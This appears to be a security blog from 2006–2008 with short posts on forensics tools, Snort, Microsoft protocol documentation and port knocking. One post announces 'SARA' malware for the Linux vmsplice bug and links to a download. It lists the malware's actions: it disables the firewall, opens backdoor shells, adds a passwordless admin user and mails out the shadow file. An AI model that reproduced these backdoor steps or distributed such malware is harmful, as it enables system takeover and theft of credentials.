si0ux

Palestra de Segurança de Redes de Computadores

2008-06-09T04:25:00.000-07:00

Segue abaixo um link para uma apresentação que usei em uma palestra na escola Coopam aqui de Orlândia. Esta palestra foi ministrada para os universitários dos cursos de Sistemas de Informação e Administração de Empresas. Falei sobre tópicos básicos do assunto, técnicas de ataques e mecanismos de defesa.

Link:
http://rapidshare.com/files/121181348/seguranca.pdf.html

Examining thumbs.db files with Vinetto

2008-04-10T11:25:00.000-07:00

Vinetto is a forensics tool to examine Thumbs.db files.
It is a command line python script that works on Linux, Mac OS X and Cygwin(win32).
The Windows systems (98, ME, 2000, XP and 2003 Server) can store thumbnails and metadata of the picture files contained in the directories of its FAT32 or NTFS filesystems.
The thumbnails and associated metadata are stored in Thumbs.db files.
The Thumbs.db files are undocumented OLE structured files.

Once a picture file has been deleted from the filesystem, the related thumbnail and associated metada remain stored in the Thumbs.db file. So, the data contained in those thumbs.db files are an helpful source of information for the forensics investigator.Vinetto extracts the thumbnails and associated metadata from the Thumbs.db files...

Link: http://vinetto.sourceforge.net/

Interactive Firewalls?

2008-03-28T04:23:00.001-07:00

Really, its a great idea to improve users experience with Linux!

Link: Interactive Firewalls

Firefox Web Application Testing Tools

2008-03-27T04:20:00.000-07:00

Lightweight and portable is always a benefit for web application exploitation tools. Take a look at this open-source plugin for Firefox and see how it fares against today's web applications.

Link:
Darknet.org

Snort-BR Updated

2008-03-25T06:26:00.000-07:00

New site of Snort Brazilian Community!!!!

Link: http://www.snort.org.br

Microsoft started a Protocols Program

2008-02-25T13:02:00.000-08:00

Microsoft has started a Protocols Program. This project includes thousands of pages of documentation (in .pdf format) divided into categories like Microsoft Communications Protocol Program (MCPP, for "server software that interoperates with Windows desktop operating systems") and Microsoft [Work Group] Server Protocol Program (WSPP, for "server software that interoperates with Microsoft Windows server and desktop operating systems to provide file, print, and user and group administration services"). I am frankly astounded by the number of documents available. Windows_Communication_Protocols.zip and Windows_Server_Protocols.zip are 314 MB total. Documentation like this is a boon for those who develop protocol analyzers, network security inspection systems, and filtering products. Security analysts and reverse engineers will also like to read this material.

SARA Linux Malware

2008-02-19T06:39:00.000-08:00

Hi all!
I released today a basic malware for to exploit the vmsplice bug on Linux kernel.
This program use the vulnerability for install some backdoors on system.

UPDATED
Actions:
- disable INPUT rules on firewall
- open the 1407 port for execute remote commands
- open a bash session on 14071 port using the xinetd daemon
- add a admin user without password
- schedule malicious tasks on cron
- mail the shadow file for a mail account

Vulnerables systems: Linux 2.6.17 - 2.6.24.1

Warning:
THIS IS A MALWARE. DON'T RUN IT IF YOU DON'T KNOW
WHAT YOU ARE DOING.

Download:
http://coarseknocking.sourceforge.net/sara/sara-malware-0.0.2.tar.gz

Coarse Knocking 0.0.6

2006-02-10T06:00:00.000-08:00

Coarse Knocking is my simple implementation of Port Knocking techniques. It sniffs
network packets with determined keys and responds by executing firewall
commands to open and close ports. In client mode, it sends packets with
the appropriate key to a server.

Link:
http://sourceforge.net/projects/coarseknocking/